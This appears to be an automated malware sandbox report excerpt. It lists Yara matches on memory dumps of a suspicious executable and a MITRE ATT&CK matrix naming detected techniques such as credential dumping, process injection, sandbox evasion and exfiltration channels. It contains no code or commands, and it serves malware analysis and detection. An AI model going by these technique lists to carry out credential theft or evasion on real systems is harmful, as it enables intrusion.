Source: Yara match	File source: Process Memory Space: RZctPlhC2XmeDKsE7v.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: 00000014.00000002.2574244036.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	241 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	21 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	157 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	361 Security Software Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Masquerading	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	251 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement